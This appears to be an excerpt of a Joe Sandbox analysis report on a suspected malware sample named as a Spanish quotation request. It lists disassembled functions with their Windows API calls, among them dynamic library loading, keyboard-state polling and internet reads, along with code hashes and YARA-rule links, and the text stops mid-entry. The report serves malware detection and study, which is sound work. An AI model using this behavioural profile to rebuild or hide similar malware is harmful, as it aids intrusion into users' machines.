API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: f3030eb037d2d93b7acc8981aa300c562e1cbd683a53eb77e92daa0fd8f91bfb
Instruction ID: 3464d8f48611f80be19aaf5a44fe0dac4c4991471b297ef569285a16dfddc7ab
Opcode Fuzzy Hash: f3030eb037d2d93b7acc8981aa300c562e1cbd683a53eb77e92daa0fd8f91bfb
Instruction Fuzzy Hash: 99516CB5A10219EFCB14CF68D884AAAB7F8FF89310B158559E905DB350E730E961CFA0

Function 00278AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00278BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00278BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00278C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00278C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00278C5F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: e215650b6208cefb268795e5bf86ae432c2547415769850744be0fdda2b509d4
Instruction ID: 88d7278c6062cd875df221866682f83c64ea70e735e397b57ff9cc3712824657
Opcode Fuzzy Hash: e215650b6208cefb268795e5bf86ae432c2547415769850744be0fdda2b509d4
Instruction Fuzzy Hash: 6C514975A102159FCB05DF64C885AAABBF5FF48314F08C459E849AB3A2CB31ED61CF90

Function 00288EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00288F40
GetProcAddress.KERNEL32(00000000,?), ref: 00288FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00288FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00289032
FreeLibrary.KERNEL32(00000000), ref: 00289052

Part of subcall function 0021F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00271043,?,7529E610), ref: 0021F6E6
Part of subcall function 0021F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0025FA64,00000000,00000000,?,?,00271043,?,7529E610,?,0025FA64), ref: 0021F70D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 8250520ccb9a84d7dec12929b2a957e7a714549a0b536b6f8103fd8fb6324cfa
Instruction ID: 15618c2d3e623695168d05ce23a21bcee59a6e8af354a056764f74899cc826be
Opcode Fuzzy Hash: 8250520ccb9a84d7dec12929b2a957e7a714549a0b536b6f8103fd8fb6324cfa
Instruction Fuzzy Hash: C4519F38611205DFC711EF68C4848ADBBF1FF49314B588099E90AAB7A2CB31ED95CF90

Function 00296B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00296C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00296C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00296C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0027AB79,00000000,00000000), ref: 00296C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00296CC7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: b958da1ac36f4a286d4b29c97c963a94508509eba6110902a2b6a3e0e7eb9eb4
Instruction ID: 6a0dbb47397573a09da00716ce898a6f2b9947ac3e0949b2fb4a95f2c2600626
Opcode Fuzzy Hash: b958da1ac36f4a286d4b29c97c963a94508509eba6110902a2b6a3e0e7eb9eb4
Instruction Fuzzy Hash: 8E41D435A24105AFDF24CF68CC5CFA97BE5EB09360F15022AF899A72E0D371ED61CA50

Function 00232051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002320C3
_free.LIBCMT ref: 002320E3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a653f82017682a41e59ae25238bb5ee12036f7a2d3172226add7c289d7c56904
Instruction ID: 075143f62c3a6cc931c8765247a2174d1806c28c981057152637e20171801be0
Opcode Fuzzy Hash: a653f82017682a41e59ae25238bb5ee12036f7a2d3172226add7c289d7c56904
Instruction Fuzzy Hash: 5641F3B2A20200EFCB24DF78C980A5EB3F5EF88714F2545A8E519EB352D731AD15CB80

Function 0021912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00219141
ScreenToClient.USER32(00000000,?), ref: 0021915E
GetAsyncKeyState.USER32(00000001), ref: 00219183
GetAsyncKeyState.USER32(00000002), ref: 0021919D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 7a5308ec6a9e2f23904ef7c75d7d921ff9eb4a9212ff0ce93c4e5500cea6a2e8
Instruction ID: dee9cb743bebbba687dd4b00b6d95388e99ec8c354a8a3475b64aef6cd48ca46
Opcode Fuzzy Hash: 7a5308ec6a9e2f23904ef7c75d7d921ff9eb4a9212ff0ce93c4e5500cea6a2e8
Instruction Fuzzy Hash: 39417F7191850BFBDF059F64D858BEEB7B4FB05320F208216E829A2290C77069E4CF51

Function 00273874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 002738CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00273922
TranslateMessage.USER32(?), ref: 0027394B
DispatchMessageW.USER32(?), ref: 00273955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00273966

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: f39bc613373f49df62157254e6b4db4a6dabd38873d316931897de3c505f3f7e
Instruction ID: 7f0441f9ecb155bb65bfad5e40f6c82160da1b62c79d8728a277c44712bb149d
Opcode Fuzzy Hash: f39bc613373f49df62157254e6b4db4a6dabd38873d316931897de3c505f3f7e
Instruction Fuzzy Hash: B0310B70925383EEEB35CF34E80CBB637A8AB05300F14855ED55AC2590D3F09AA4EB11

Function 0027CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0027C21E,00000000), ref: 0027CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0027CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0027C21E,00000000), ref: 0027CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0027C21E,00000000), ref: 0027CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0027C21E,00000000), ref: 0027CFF2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 36ea1cac628b281fbaf67ff06329ad702a8ed88906bbaa02cc45314e807b4d41
Instruction ID: f82d19386ffefe7dea1f9be8a4cb337f437c4cd09f6afeb5f976f4bbc43629e4
Opcode Fuzzy Hash: 36ea1cac628b281fbaf67ff06329ad702a8ed88906bbaa02cc45314e807b4d41
Instruction Fuzzy Hash: 78318E71620206EFDB20DFB5D884AABBBF9EF14310B20842FF51AD2511DB30AE50DB61

Function 00261901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00261915
PostMessageW.USER32(00000001,00000201,00000001), ref: 002619C1
Sleep.KERNEL32(00000000,?,?,?), ref: 002619C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 002619DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002619E2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e2f227edd48fc080f75bb0aa2bcd48bca7555910fa9d638419a363aae5396a55
Instruction ID: 4249b90a6dd77e31695a64a95c968f2f752ec9503967b0eda1e7a8339316dedc
Opcode Fuzzy Hash: e2f227edd48fc080f75bb0aa2bcd48bca7555910fa9d638419a363aae5396a55
Instruction Fuzzy Hash: 0C31C271910219EFCB04CFA8DD9DADE3BB5EB44315F144225F925A72D1C770A9A4CB90

Function 00295706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00295745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0029579D
_wcslen.LIBCMT ref: 002957AF
_wcslen.LIBCMT ref: 002957BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00295816

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 09367af80f801e921618b8f0f2001f866403b57da78d4da4313a65c11564afe4
Instruction ID: faf2ccc5258f26574f49b711ad93f357ab2d3a5de7ae1854b90f1ac80410e7b0
Opcode Fuzzy Hash: 09367af80f801e921618b8f0f2001f866403b57da78d4da4313a65c11564afe4
Instruction Fuzzy Hash: 56218771A24629EADF219FA0DC45AEDB778FF44724F104116F929DA180D7708AA5CF50

Function 00280930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00280951
GetForegroundWindow.USER32 ref: 00280968
GetDC.USER32(00000000), ref: 002809A4
GetPixel.GDI32(00000000,?,00000003), ref: 002809B0
ReleaseDC.USER32(00000000,00000003), ref: 002809E8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 0e46e1134365d9c82e26150e2f6f6cc53d98f08c8672d586ab9db1136d5cbfa5
Instruction ID: d64e5174d7ab0bc41b4e3960775927218c25a39b1cc705ffda4855919032259e
Opcode Fuzzy Hash: 0e46e1134365d9c82e26150e2f6f6cc53d98f08c8672d586ab9db1136d5cbfa5
Instruction Fuzzy Hash: C4218175610204AFD714EF69D888AAEBBE9EF48700F148069E85A977A2DB70AC54CF50

Function 0023CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0023CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0023CDE9

Part of subcall function 00233820: RtlAllocateHeap.NTDLL(00000000,?,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6,?,00201129), ref: 00233852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0023CE0F
_free.LIBCMT ref: 0023CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023CE31

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 6e76e069cde6b6e5b41bb4398604248a60db5b1fdba788d7b1fe19c1cf4dceed
Instruction ID: a60624b8d73726010ace37f3bbf44da9aebb5bd7fbb4cafd90c5cb5985c62bc7
Opcode Fuzzy Hash: 6e76e069cde6b6e5b41bb4398604248a60db5b1fdba788d7b1fe19c1cf4dceed
Instruction Fuzzy Hash: 5501FCF26212157F23212A767C4CD7B796DDEC6BA1735012AFD05E7201DA618D2187B4

Function 00219639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00219693
SelectObject.GDI32(?,00000000), ref: 002196A2
BeginPath.GDI32(?), ref: 002196B9
SelectObject.GDI32(?,00000000), ref: 002196E2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 4bfafff300e03c63ce1df6126347e9402e141dd43248ddac06e9f58bf5417b24
Instruction ID: db15b7f3eaa00a7228daebd1f3ca42dc8fd60ac285eefdebb60c23c8b641ddfd
Opcode Fuzzy Hash: 4bfafff300e03c63ce1df6126347e9402e141dd43248ddac06e9f58bf5417b24
Instruction Fuzzy Hash: 42212C70922286EBDB119F64FC287E97BA8BB60365F200217F414A65A1D3709CF5CBA5

Function 00265711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00265726
_memcmp.LIBVCRUNTIME ref: 00265744
_memcmp.LIBVCRUNTIME ref: 00265757
_memcmp.LIBVCRUNTIME ref: 0026576F
_memcmp.LIBVCRUNTIME ref: 00265787

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c35e46165fbf91dcd2b28be0badafd197d45e67fbb98c098a50fccad91d9ac54
Instruction ID: 0f47b2387794a50bdcd0fbf2a9ae2aedf695fa61178bf9ae87c3587bbcc20248
Opcode Fuzzy Hash: c35e46165fbf91dcd2b28be0badafd197d45e67fbb98c098a50fccad91d9ac54
Instruction Fuzzy Hash: 2301B9616B1625BBD65999109E42FBBB35D9B353A4F004021FD04AA641F761ED7086E0

Function 00232DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0022F2DE,00233863,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6), ref: 00232DFD
_free.LIBCMT ref: 00232E32
_free.LIBCMT ref: 00232E59
SetLastError.KERNEL32(00000000,00201129), ref: 00232E66
SetLastError.KERNEL32(00000000,00201129), ref: 00232E6F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e72de69584be09f6b1f49b618789a4a35bb10e06adf2ab4379de8d3f4653d482
Instruction ID: ba28bce5f5e1d890af98bcde0f3af662a7e4da394f1d309c598fc15eccd6cb2a
Opcode Fuzzy Hash: e72de69584be09f6b1f49b618789a4a35bb10e06adf2ab4379de8d3f4653d482
Instruction Fuzzy Hash: D5012DF2235601EBC6126B757C4BE2B255DABC5375F350025F825922D3EFB0EC395420

Function 0026000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?,?,0026035E), ref: 0026002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?), ref: 00260046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?), ref: 00260054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?), ref: 00260064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?), ref: 00260070

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 6114173a1bacbd1644ee960802c17a6e470870005eabd52b3695ec031060b188
Instruction ID: f0386a015005561f413f755b1ceffa2902cc4693ff7fcf72407e9f7a33d9989e
Opcode Fuzzy Hash: 6114173a1bacbd1644ee960802c17a6e470870005eabd52b3695ec031060b188
Instruction Fuzzy Hash: B301A272620215BFDB114F68EC88BAB7AEDEF44791F244125F905D2210D7B1DD90ABA0

Function 0026E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0026E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0026E9A5
Sleep.KERNEL32(00000000), ref: 0026E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0026E9B7
Sleep.KERNEL32 ref: 0026E9F3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 444cd478f1aedb38cfe5d3e4dad2a5196ce9a619fe3dff12b5aa3c98bf5d02cc
Instruction ID: ce6c8c6c01c451add084ebea790e031c442d4c85e8b305b2bda45554bf155914
Opcode Fuzzy Hash: 444cd478f1aedb38cfe5d3e4dad2a5196ce9a619fe3dff12b5aa3c98bf5d02cc
Instruction Fuzzy Hash: 66015735C12629DBCF00AFE5E85DAEDBB78BF08700F120556E902B2240CB3095A48BA6

Function 002610F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 0026112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00260B9B,?,?,?), ref: 00261136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0026114D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
